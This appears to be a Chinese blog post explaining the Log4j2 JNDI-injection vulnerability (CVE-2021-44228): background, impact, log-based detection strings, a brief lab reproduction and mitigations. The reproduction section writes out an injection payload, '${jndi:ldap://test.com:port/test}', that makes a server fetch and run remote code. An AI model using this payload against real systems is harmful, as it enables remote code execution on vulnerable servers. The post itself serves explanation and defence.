Log4j2漏洞

已于 2022-03-23 10:48:45 修改
阅读量561 收藏 3
点赞数
分类专栏: CVE 文章标签: 安全
于 2022-03-08 12:23:13 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_45455136/article/details/123305346
版权

Log4j2漏洞简介

Log4j介绍

Log for Java,Apache的开源日志记录组件,不同的package打印格式不同

  • 记录日志的作用
    可以对程序的运行进行调试跟踪
    对业务操作进行记录,方便追溯
  • 基本操作
    pom引入依赖
    获得logger实例
    logger.info() debug() error() warn() …

LDAP

Lightweight Directory Access Protocol,轻量级目录访问协议(目录服务),树形目录数据库

  • 目录数据库
    目录数据库和关系数据库不同,它有优异的读性能,适合查询,但写性能差且没有事务处理、回滚等复杂功能,不适于存储修改频繁的数据。
  • 目录服务用途
    统一登录(OA系统、邮箱服务器、Git服务器、VPN)

JNDI

Java Naming and Directory Interface,Java命名和目录接口(命名服务接口),一个接口访问不同的命名和目录服务

  • JNDI可访问的服务
    LDAP目录服务、RMI远程方法调用、DNS、XNam、Novell目录服务、CORBA对象服务、文件系统、Windows XP/2000/NT/Me/9x的注册表、DSML v1&v2、NIS
    在这里插入图片描述

命名服务(Naming Service)

根据名字找到位置、服务、信息、资源、对象等Key-Value

  • 基本操作
    公布资源(名字和资源的映射):bind()
    用名字查找资源:lookup()

JNDI注入

JNDI动态协议转换

即使初始化的Context指定了一个协议,也会根据URI传入的参数来转换协议
比如:Context初始化是RMI服务,但是lookup 的参数是LDAP服务,这个时候协议会动态转 换。

命名引用Naming Reference

  • 不在命名/目录服务本地的一个资源,叫做命名引用,对应Reference类
  • 让JNDI请求不存在的资源
  • 当JNDI客户端在本地classpath找不到这个类中,就会去指定的远程地址请求下载这个类到本地执行

Log4j2漏洞原理

Log4j2支持JNDI lookup功能从而方便的引用外部资源,从而能够进行JNDI注入
在这里插入图片描述执行完下载的恶意代码后,Log4j2调用了javax/naming/spi/NamingManager.java创建实例导致恶意代码自动执行
ObjectFactory

Log4j2漏洞影响

Log4j2漏洞基于供应链已蔓延影响至虚拟化等网络基础设施,受到影响的项目非常多

  • CVE-2021-44228影响版本
    使用了Log4j2的组件,并且版本在2.x <= 2.14.1,JDK版本小于8u191、7u201、6u211

Log4j2漏洞排查方法

手动排查

  • pom版本检查
  • 通过检查日志中是否存在"jndi:ldap://"、“jndi:rmi”、"dnslog.cn"等字符来发现可能的攻击行为
  • 检查日志中是否存在相关堆栈报错,堆栈里是否有JndiLookup、ldapURLContext、getObjectFactoryFromReference等与jndi调用相关的堆栈信息

排查工具

  • https://static.threatbook.cn/tools/log4j-local-check.sh
  • https://sca.seczone.cn/allScanner.zip

Log4j2漏洞复现

  1. 启动LDAP目录服务监听LDAP端口(或使用marshalsec工具包),启动远程HTTP服务器,LDAP服务指向恶意HTTP网址
    在这里插入图片描述
  2. 假设用户可控写入的日志,传入 ${jndi:ldap://test.com:port/test},就会向JNDI接口请求LDAP服务器不存在的资源
    在这里插入图片描述
  3. 通过LDAP向恶意HTTP服务器下载恶意类代码,加载Exploit静态代码打开计算器
    在这里插入图片描述

Log4j2 RCE漏洞修复

  1. 禁止用户请求参数出现攻击关键字–安全产品(WAF、RASP等)
  2. 禁止lookup下载远程文件(命名引用)
  3. 禁止Log4j的应用连接外网
  4. 禁止Log4j使用lookup
  5. 从Log4j jar包中删除lookup(2.10以下)
  • Log4j框架升级到2.17.1版本
    1)默认不再支持二次跳转(命名引用)的方式获取对象
    2)只有在log4j2.allowedLdapClasses列表中指定的class才能获取
    3)只有远程地址是本地地址或者在log4j2.allowedLdapHosts列表指定的地址才能获取
  • 其他方案
    升级JDK
    修改log4j配置:(1)设置参数log4j2.formatMsgNoLookups=True (2)修改JVM参数Dlog4j2.formatMsgNoLookups=true (3)系统环境变量FORMAT_MESSAGES_PATTERN_DISABLE_ LOOKUPS设置为true (4)禁止log4j2 所在服务器外连
c1o22
关注
  • 0
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
log4j2漏洞检测工具
05-07
**Log4j2漏洞检测工具详解** 在当前的IT环境中,安全问题日益凸显,特别是针对开源组件的安全漏洞Log4j2,一个广泛使用的Java日志框架,最近曝出的重大安全漏洞(CVE-2021-44228,被称为Log4Shell)引起了全球的...
Apache Log4j2 远程代码执行漏洞检测工具
12-15
漏洞影响了全球大量的网络服务,因此,快速、准确地检测和修复Log4j2漏洞变得至关重要。 针对这个漏洞,开发出了专门的Apache Log4j2远程代码执行漏洞检测工具,这些工具包括针对Windows和Linux操作系统的版本。...
log4j2漏洞原理和漏洞环境搭建复现
dreamthe的博客
03-03 1万+
背景 2021年11月24日,阿里云安全团队向Apache官方报告了Apache Log4j2远程代码执行漏洞。由于Apache Log4j2某些功能存在递归解析功能,攻击者可直接构造恶意请求,触发远程代码执行漏洞漏洞利用无需特殊配置,经阿里云安全团队验证,Apache Struts2、Apache Solr、Apache Druid、Apache Flink等均受影响。阿里云应急响应中心提醒 Apache Log4j2 用户尽快采取安全措施阻止漏洞攻击。 log4j3远程代码执行漏洞主要由于存在JN
Log4j2漏洞修复
derstsea的专栏
12-14 1万+
一、漏洞说明 Apache Log4j2是一个基于Java的日志记录工具。由于Apache Log4j2某些功能存在递归解析功能,攻击者可直接构造恶意请求,触发远程代码执行漏洞漏洞利用无需特殊配置,经阿里云安全团队验证,Apache Struts2、Apache Solr、Apache Druid、Apache Flink等均受影响。 漏洞适用版本为 2.0 <= Apache log4j2 <= 2.14.1,只需检测Java应用是否引入 log4j-api , log4j-core 两个j
Log4j2 远程代码执行漏洞(CVE-2021-44228)
最新发布
qq_68163788的博客
06-18 1213
Apache Log4j2是一个基于Java的日志记录工具,当前被广泛应用于业务系统开发,开发者可以利用该工具将程序的输入输出信息进行日志记录。CVE-2021-44228是Log4j2中存在的一个严重的远程代码执行漏洞。攻击者可以通过恶意构造的日志信息,利用该漏洞执行恶意代码,从而危害受影响的系统。这个漏洞对于使用Log4j2的应用程序和系统构成了潜在的安全风险。
log4j2远程代码执行漏洞原理与漏洞复现(基于vulhub,保姆级的详细教程)
热门推荐
Bossfrank的博客
04-14 2万+
本文是log4j2远程代码执行漏洞原理和漏洞复现的详细说明。基于vulhub搭建靶场,攻击者利用log4j2框架下的lookup服务提供的{}字段解析功能,在{}内使用了了JNDI注入的方式,通过RMI或LDAP服务远程加载了攻击者提前部署好的恶意代码(.class),最终造成了远程代码执行。
【紧急】Log4j又发新版2.17.0,只有彻底搞懂漏洞原因,才能以不变应万变
Tom弹架构
12-20 1896
1 事件背景 经过一周时间的Log4j2 RCE事件的发酵,事情也变也越来越复杂和有趣,就连 Log4j 官方紧急发布了 2.15.0 版本之后没有过多久,又发声明说 2.15.0 版本也没有完全解决问题,然后进而继续发布了 2.16.0 版本。大家都以为2.16.0是最终终结版本了,没想到才过多久又爆雷,Log4j 2.17.0横空出世。 相信各位小伙伴都在加班加点熬夜紧急修复和改正Apache Log4j爆出的安全漏洞,各企业都瑟瑟发抖,连网警都通知各位站长,包括我也收到了湖南长沙高新区网警的通知。
Log4j漏洞及解决方案,亲测
weixin_42492886的博客
12-14 1万+
log4j漏洞解决方案,亲测
log4j2.17.2
04-14
总结,log4j2.17.2是应对Log4j2 RCE漏洞的重要更新,通过加强安全配置和限制危险功能,为Java应用程序提供了更坚固的安全屏障。对于依赖Log4j2的系统而言,及时升级至该版本是保障系统安全、防范潜在风险的有效手段...
LOG4J RCE 漏洞分享与自查.pdf
12-15
Log4j RCE 漏洞是近期爆发的一种高危漏洞,它影响了全球许多业务线,原因在于引入的 Log4j2 2.10.0 版本中存在的漏洞。本文将详细介绍 Log4j RCE 漏洞的成因、漏洞复现、检测方法和解决方案。 漏洞原因: Log4j ...
Log4j2 RCE漏洞分析
03-14
记录一下log4j2 RCE的原理
Log4j2漏洞检测工具
02-06
Apache log4j 2是一款开源的Java日志记录框架,提供方便的日志记录,通过定义每一条日志信息的级别,能够更加细致地控制日志生成过程,以便用于编写程序时进行调试,在项目上线后出现状况时也可根据日志记录来判断...
Apache Log4j 2代码漏洞处置指南及检测工具.zip
12-10
Apache Log4j 2存在远程代码执行漏洞处置指南 及期检测工具
log4j log4j2 2.15.0漏洞解决
12-10
《深入解析Log4j与Log4j2 2.15.0漏洞及解决方案》 在信息技术领域,日志记录是系统监控、故障排查和安全分析的重要环节。Log4j和Log4j2作为Java平台广泛使用的日志框架,其性能高效、功能强大,深受开发者喜爱。...
log4j2_rce 项目
02-23
《深入理解Log4j2 RCE漏洞:从概念到实战》 在信息技术领域,安全问题始终是关注的焦点。本文将深入探讨一个重要的安全漏洞——Log4j2远程代码执行(RCE)漏洞,该漏洞曾引起全球广泛关注。我们将从项目标题"Log4j2...
log4j2漏洞分析
weixin_47623655的博客
04-11 1312
漏洞标识符为CVE-2021-44228,通常称为Log4Shell或Log4j漏洞,它存在于Log4j的JNDI查找功能中。攻击者可以通过特殊构造的请求利用此漏洞,向Log4j发送恶意请求,从而触发远程代码执行(RCE)漏洞,进而获得服务器上的完全控制权限。这个漏洞的危害非常大,由于Log4j广泛应用于各种Java应用程序中,这意味着攻击者可以利用该漏洞轻松攻击大量的目标。
Log4j2最近被爆出巨大漏洞
文盲青年的博客
12-11 3293
一、背景 近日,知名sl4j日志规范实现框架log4j2被爆出巨大漏洞,可被黑客利用jndi机制执行非法命令,获取服务器权限等,不幸的是很多知名框架也用了log4j2,我们熟知的如Apache Struts2、Apache Solr、Apache Druid、Apache Flink… 相信很多互联网厂此刻正瑟瑟发抖,紧急修复。 国家网络应急中心也紧急发布了处理意见:关于Apache Log4j2存在远程代码执行漏洞安全公告 很多服务使用了log4j2框架,并且打了API入参日志、三方交互日志等,正在被黑
log4j漏洞
fulong0406的博客
01-04 563
最新消息!根据Log4j官网发布,2.17.0版本还存在漏洞! 上图来自Log4j2官网:Log4j – Apache Log4j 2 漏洞编号:CVE-2021-44832 漏洞内容:Log4j2提供的JDBCAppender功能,将日志信息写入数据库中,这个过程需要JNDI的支持,故攻击者可以利用此来执行任意代码。 危害等级:中 影响范围:2.17.0及以下版本(不包含2.12.4、2.3.2) 修复措施:升级Log4j2的版本 Java 8或之后用户升级到最新的2.17.1 Jav
log4j2漏洞原理
07-28
log4j2漏洞是指Apache Log4j2框架中存在的一个安全漏洞,该漏洞被称为"Log4Shell"或"CVE-2021-44228"。该漏洞的原理是由于log4j2框架在处理日志消息时,会自动解析并执行包含特定JNDI注入代码的日志消息。这意味着...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值